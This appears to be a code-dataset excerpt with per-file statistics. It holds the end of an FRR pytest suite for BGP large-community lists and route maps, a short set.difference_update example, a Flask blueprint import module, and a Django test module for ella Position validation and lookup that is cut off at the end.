"name": "Test",
"value": "1:2:1 1:1:10 1:3:100",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_3 = {
"r6": {
"route_maps": {
"RM_R6_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {"large_comm_list": {"id": "Test", "delete": True}},
}
]
}
},
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:2:1 1:1:10 1:3:100 2:1:1 2:2:2 2:3:3"
" 2:4:4 2:5:5",
"action": "additive",
}
},
}
]
}
},
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
"r6": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r6": {
"route_maps": [
{"name": "RM_R6_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_5 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_no_send_community(request):
"""
    This test is to verify that if community values are NOT to be advertised
    to a specific neighbour, we can negate the send-community command
    (send-community all is enabled by default for all neighbors).
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r5": {
"route_maps": {
"RM_R6_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r5": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r5": {
"route_maps": [
{
"name": "RM_R6_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {
"r5": {
"route_maps": [
{
"name": "RM_R6_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r6"
input_dict_4 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Configure neighbor for no-send-community")
input_dict_5 = {
"r5": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {"r5": {"no_send_community": "large"}}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r6": {
"dest_link": {"r5": {"no_send_community": "large"}}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify Community-list")
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_4, expected=False
)
assert result is not True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_create_large_community_lists_with_no_attribute_values(request):
"""
    This test is to verify that large-community lists cannot be
    configured without providing specific L-community values
    (for match/delete operation in a route-map).
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create standard large commumity-list")
input_dict_1 = {
"r5": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "Test1",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is not True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
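# The next three tests exercise the three large-community match semantics:
# EXACT passes only when the prefix carries exactly the listed values, ALL
# passes when the prefix carries at least all listed values (extras allowed),
# and ANY passes when at least one listed value is present.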
def test_large_community_lists_with_rmap_match_exact(request):
"""
    This test is to verify that the Match_EXACT clause should pass
    only if all of the L-comm values configured (horizontally)
    in the community list are present in the prefix. There must
    be no additional L-communities in the prefix.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map and advertise networks")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "EXACT",
"value": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {
"large-community-list": ["EXACT"],
"match_exact": True,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_all(request):
"""
    This test is to verify that the Match_ALL clause should pass
only if ALL of the L-comm values configured (horizontally)
in the community list are present in the prefix. There
could be additional L-communities in the prefix that are
not present in the L-comm list.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"set": {
"large_community": {
"num": "1:1:1 1:2:3 2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ALL",
"value": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {"large-community-list": {"id": "ALL"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "1:1:1 1:2:3 2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_any(request):
"""
    This test is to verify that the Match_ANY clause should pass
    only if at least one L-comm value configured (vertically)
    in the large-community list is present in prefixes.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:1:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:2:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:3:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:4:1",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {"large-community-list": {"id": "ANY"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_7)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_regex(request):
"""
    This test is to verify large-community lists' operation in a route-map
    with match RegEx statements. The match clause should pass only if the
    complete string of L-comm values is matched.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
    # Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5",
},
"community": {"num": "1:1 1:2 1:3 1:4 1:5"},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ALL",
"value": "1:1:1 2:1:3 2:1:4 2:1:5",
"large": True,
},
{
"community_type": "expanded",
"action": "permit",
"name": "EXP_ALL",
"value": "1:1:1 2:1:[3-5]",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {
"large_community_list": {
"id": "ALL",
},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_7)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Delete route map reference by community-list")
input_dict_3 = {"r4": {"route_maps": ["RM_R4_IN"]}}
result = delete_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "20",
"match": {
"large_community_list": {
"id": "EXP_ALL",
},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("clear ip bgp")
result = clear_bgp_and_verify(tgen, topo, "r4")
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_7, expected=False
)
assert result is not True, (
"Testcase {} : Failed \n "
"largeCommunity is still present \n Error: {}".format(tc_name, result)
)
write_test_footer(tc_name)
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
| 35.012086
| 91
| 0.366238
| 6,349
| 78,217
| 4.31627
| 0.0619
| 0.041381
| 0.031966
| 0.04992
| 0.867611
| 0.855569
| 0.844548
| 0.837469
| 0.823748
| 0.806561
| 0
| 0.035191
| 0.5317
| 78,217
| 2,233
| 92
| 35.027765
| 0.71296
| 0.090645
| 0
| 0.565804
| 0
| 0.011327
| 0.184747
| 0.000482
| 0
| 0
| 0
| 0.000448
| 0.039374
| 1
| 0.00863
| false
| 0
| 0.004854
| 0
| 0.013484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6be6f9a2cd0c9d9f5f904f3120f1946f91b59203
| 114
|
py
|
Python
|
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
# s.difference_update({1, 2, 3}, {4, 10})
s = {1, 2, 3, 4, 5, 6}
s.difference_update({1, 2, 3}, {4, 10})
print(s)
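# prints {5, 6}: every element found in either argument iterable is removed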
| 22.8
| 41
| 0.535088
| 25
| 114
| 2.36
| 0.44
| 0.101695
| 0.152542
| 0.20339
| 0.779661
| 0.779661
| 0.779661
| 0.779661
| 0
| 0
| 0
| 0.191489
| 0.175439
| 114
| 4
| 42
| 28.5
| 0.43617
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e2b2988812b421498416fa36a17d5c7f4e0676a
| 249
|
py
|
Python
|
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
from got.controllers.battles_controller import blueprint as battles
from got.controllers.character_deaths_controller import blueprint as character_deaths
from got.controllers.character_predictions_controller import blueprint as character_predictions
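# A typical way these re-exported blueprints are consumed (a hypothetical
# sketch; the Flask app factory is not part of this module):
#
#     from flask import Flask
#     from got.controllers import battles, character_deaths, character_predictions
#
#     app = Flask(__name__)
#     for bp in (battles, character_deaths, character_predictions):
#         app.register_blueprint(bp)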
| 83
| 95
| 0.907631
| 31
| 249
| 7.064516
| 0.354839
| 0.09589
| 0.246575
| 0.369863
| 0.328767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068273
| 249
| 3
| 95
| 83
| 0.943966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
2e51331e960f5cd17f5aa3d5eb66a76b74cb7a40
| 7,711
|
py
|
Python
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 75
|
2015-01-17T08:30:08.000Z
|
2022-02-23T19:05:36.000Z
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 3
|
2016-04-21T22:16:37.000Z
|
2021-07-08T12:47:37.000Z
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 26
|
2015-02-12T04:13:41.000Z
|
2022-01-08T05:26:27.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from test_ella.cases import RedisTestCase as TestCase
from nose import tools
from django.template import Context, NodeList
from django.contrib.contenttypes.models import ContentType
from django.db.models import Max
from django.core.exceptions import ValidationError
from test_ella.test_core import create_basic_categories
from ella.positions.models import Position
from ella.utils.timezone import now, utc_localize
class TestPosition(TestCase):
def setUp(self):
super(TestPosition, self).setUp()
create_basic_categories(self)
def test_validation_fails_for_globaly_active_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text')
p = Position(category=self.category, name='position-name', text='other text')
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text')
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions2(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_from=utc_localize(datetime(2010, 9, 10)))
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions3(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_from=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_till=utc_localize(datetime(2010, 10, 11)))
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_passes_for_nonoverlapping_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_from=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))
p.full_clean()
def test_validation_fails_for_incorrect_generic_fk(self):
p = Position(category=self.category, name='position-name', target_ct=ContentType.objects.get_for_model(Position), target_id=123455)
tools.assert_raises(ValidationError, p.full_clean)
def test_render_position_without_target_renders_txt(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals('some text', p.render(Context({}), NodeList(), ''))
def test_render_position_with_invalid_target_returns_empty(self):
target_ct = ContentType.objects.get_for_model(ContentType)
invalid_id = ContentType.objects.aggregate(Max('id'))['id__max'] + 1
p = Position.objects.create(category=self.category, name='position-name', text='some text', target_ct=target_ct, target_id=invalid_id)
tools.assert_equals('', p.render(Context({}), NodeList(), ''))
def test_get_active_position(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name'))
def test_get_active_position_nofallback(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name', nofallback=True))
def test_get_active_position_inherit(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_get_active_position_inherit_nofallback(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_false(Position.objects.get_active_position(self.category_nested, 'position-name', nofallback=True))
def test_get_active_position_empty(self):
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_till_past(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=now()-timedelta(days=1))
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_from_future(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_from=now()+timedelta(days=1))
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_till_future(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=now()+timedelta(days=1))
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_past(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_from=now()-timedelta(days=1))
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_till_match(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=now()-timedelta(days=1),
active_till=now()+timedelta(days=1),
)
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_till_no_match(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=now()-timedelta(days=3),
active_till=now()-timedelta(days=1),
)
